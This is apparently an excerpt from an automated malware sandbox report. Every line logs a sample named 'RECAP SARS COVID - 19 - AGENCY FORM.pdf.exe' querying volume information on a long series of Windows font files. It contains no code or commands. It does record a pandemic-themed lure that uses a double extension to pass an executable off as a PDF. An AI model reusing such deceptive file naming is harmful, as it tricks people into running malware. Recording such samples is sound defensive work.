Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
